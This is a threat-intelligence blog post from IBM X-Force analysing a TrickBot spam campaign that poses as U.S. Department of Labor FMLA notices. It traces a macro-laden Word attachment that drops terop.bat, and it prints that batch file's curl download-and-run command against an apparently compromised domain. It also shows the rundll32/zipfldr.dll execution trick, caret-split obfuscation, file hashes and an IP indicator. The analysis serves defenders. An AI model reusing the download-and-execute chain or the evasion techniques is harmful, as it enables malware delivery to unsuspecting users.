IBM X-Force monitors billions of spam emails a year, mapping trending, malicious campaigns and their origins. Recent analysis from our spam traps uncovered a new Trickbot campaign that currently targets email recipients with fake messages purporting to come from the U.S. Department of Labor (DoL). The spam leverages the Family and Medical Leave Act (FMLA), which gives employees the right to medical leave benefits, as context around COVID-19 in order to distribute the malware.

Figure 1: Fake FMLA-themed email distributing malicious payloads

TrickBot is a sophisticated banking Trojan operated by an organized cybercrime gang. Users infected with the TrickBot Trojan will see their device become part of a botnet that can allow attackers to gain complete control of the device. Typical consequences of TrickBot infections are bank account takeover, high-value wire fraud, and possibly ransomware attacks targeting organizational networks. TrickBot is not limited to these types of attacks and X-Force has been seeing it dabble in additional cybercrime endeavors in the recent past, specifically teaming up with ITG08, known as FIN6, to carry out financially motivated attacks on the retail sector.

Spam purporting to come from official and government entities has been increasing considerably during the COVID-19 pandemic, with cybercriminals developing spam to match trending news, developments, merchandise and initiatives surrounding the outbreak as a means to deliver unsolicited emails that attract recipients to open and launch attachments.

DocuSign-Themed Maldocs and Malicious Macros

The email sample we started with, US-DoL.eml, contains three attachments: us-logo.png, faq.png and Family and Medical Leave of Act 22.04.doc. The .PNG files are benign image files that are visible in the HTML version of the email and contain a DoL logo and FAQ | CONTACT US, respectively. The document file is the malicious component.

Malicious document files are one of the most popular ways for cybercriminals to distribute malware. In the spam samples we looked at, the eventual TrickBot payload started out in a DocuSign-type attachment titled Family and Medical Leave of Act 22.04.doc. Once opened, the document asks the recipient to enable macros (ThisDocument.cls), from which, upon closing the file, malicious scripts will be launched to fetch the malware from the attacker’s designated domain.

The macro begins by creating a local directory, C:\Test, and drops a batch file, terop.bat, to that location. It then executes that file: C:\Test\terop.bat.

Overall, the following files are used in the infection chain:

File Name File Category File Hash Parent
US-DoL.eml Email f481ba37fdcfaee9fa991e203963bad8 N/A
Family and Medical Leave of Act 22.04.doc Carrier File d341215eb15167870aeff64d5380a69b US-DoL.eml
terop.bat Downloader 9f52f07856cdf2b076c27ae60cb0d100 Family and Medical Leave of Act 22.04.doc
faq.png Benign eb77c6a9fc86bd73d77b92c24ca889db US-DoL.eml
us-logo.png Benign 1af19e6717acf7f38b8f1a651c738954 US-DoL.eml
Scroll to view full table

Terop.bat

The primary purpose of terop.bat is to download a PE file and execute it using the following commands:

curl https[:]//www[.]omegasystemsuae[.]com/9hfudnsfl.exe –output %appdata%/Bio_Tecs.exe rundll32.exe, zipfldr.dll,RouteTheCall %appdata%\Bio_Tecs.exe

Some of the commands are broken up using the following technique:

TI^

ME^

OUT ^

Terop.bat contains TIMEOUT /T 30 and ping 8.8.8.8 commands to evade detection and delay execution.

Next, a route is added with the following command:

add 10.0.0.0 mask 255.0.0.0 10.35.8.1 -p.

This route appears to be needed for testing. The pathname, C:\Test, which terop.bat is initially written to, may suggest that this downloader is still being tested by those distributing the malware, which could explain some failures to fetch the final stage payload down the line.

Using the cURL utility, the terop.bat file attempts to download an executable from what appears to be a hijacked or compromised domain: hxxps://www.omegasystemsuae[.]com/9hfudnsfl.exe

The file is set to be written to %APPDATA%\Bio_Tecs.exe. However, since cURL is not available as part of a standard Windows deployment and it was not dropped by the malicious macro, that command ultimately failed and did not actually download the file.

Zipfldr.dll

zipfldr.dll is a standard Windows dynamic link library (DLL) that can be used as an alternate way to execute PE files using the exported function RouteTheCall. This command also fails due to the file not being downloaded nor written to the designated location that was set at %APPDATA%\Bio_Tecs.exe by a cURL command.

Robocopy.exe

Another executable file that takes part in the overall infection routine is named Robocopy.exe. This file is used to move some files as well; however, during our analysis we noticed there was an issue that prevented the macro from writing the command to the batch file and the variables were not expanded. That also caused issues with string concatenation, which resulted in the command failing when the batch file was executed:

robocopy ” & sSource & ” /e /z /s ” & sPath & ” D:\Files E:\Backup ” & sFile

Is It TrickBot?

Without the actual payload, is it TrickBot or another malware? Based on observation of similar patterns in previous TrickBot campaigns, the “Macro on Close” function followed by the DocuSign theme has been a tactic used by this malware’s distributors. Another link to TrickBot is an IP address, 198.72.111.141, also previously linked with hosting TrickBot campaigns.

It is possible that malware is being distributed by the same parties and the final payload is possibly different, but TrickBot mostly uses the same distribution channels compared to more commercialized malware.

Endless COVID-19-Themed Spam Continues to Deliver Malware

As the COVID-19 pandemic continues to hold the attention of people everywhere in an unprecedented manner, we are sure to continue seeing the use of this theme in endless amounts of spam and attacks targeting users across the globe.

The current spam is likely an early warning to those expecting to take advantage of the FMLA during the pandemic to be on the lookout for malicious campaigns. TrickBot spam varies frequently depending on those distributing it, and the issues we detected in the macro scripts are likely to be fixed and relaunched in further spamming activity.

TrickBot is one of the leading and most sophisticated banking Trojans active in the wild this year. It is involved in high-stakes bank fraud, ransomware attacks and big game hunting activity that targets organizations around the globe.

Get indicators of compromise (IoCs) for this campaign on X-Force Exchange, and follow our collections on emerging threat intelligence to keep up to date about trending campaigns.

More from Malware

Kronos Malware Reemerges with Increased Functionality

The Evolution of Kronos Malware The Kronos malware is believed to have originated from the leaked source code of the Zeus malware, which was sold on the Russian underground in 2011. Kronos continued to evolve and a new variant of Kronos emerged in 2014 and was reportedly sold on the darknet for approximately $7,000. Kronos is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims. After remaining…

A View Into Web(View) Attacks in Android

James Kilner contributed to the technical editing of this blog. Nethanella Messer, Segev Fogel, Or Ben Nun and Liran Tiebloom contributed to the blog. Although in the PC realm it is common to see financial malware used in web attacks to commit fraud, in Android-based financial malware this is a new trend. Traditionally, financial malware in Android uses overlay techniques to steal victims’ credentials. In 2022, IBM Security Trusteer researchers discovered a new trend in financial mobile malware that targets…

RansomExx Upgrades to Rust

IBM Security X-Force Threat Researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language, joining a growing trend of ransomware developers switching to the language. Malware written in Rust often benefits from lower AV detection rates (compared to those written in more common languages) and this may have been the primary reason to use the language. For example, the sample analyzed in this report was not detected as malicious in the…

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security research draws another link between the Raspberry Robin infections and the Russia-based cybercriminal group 'Evil Corp,' which is the same…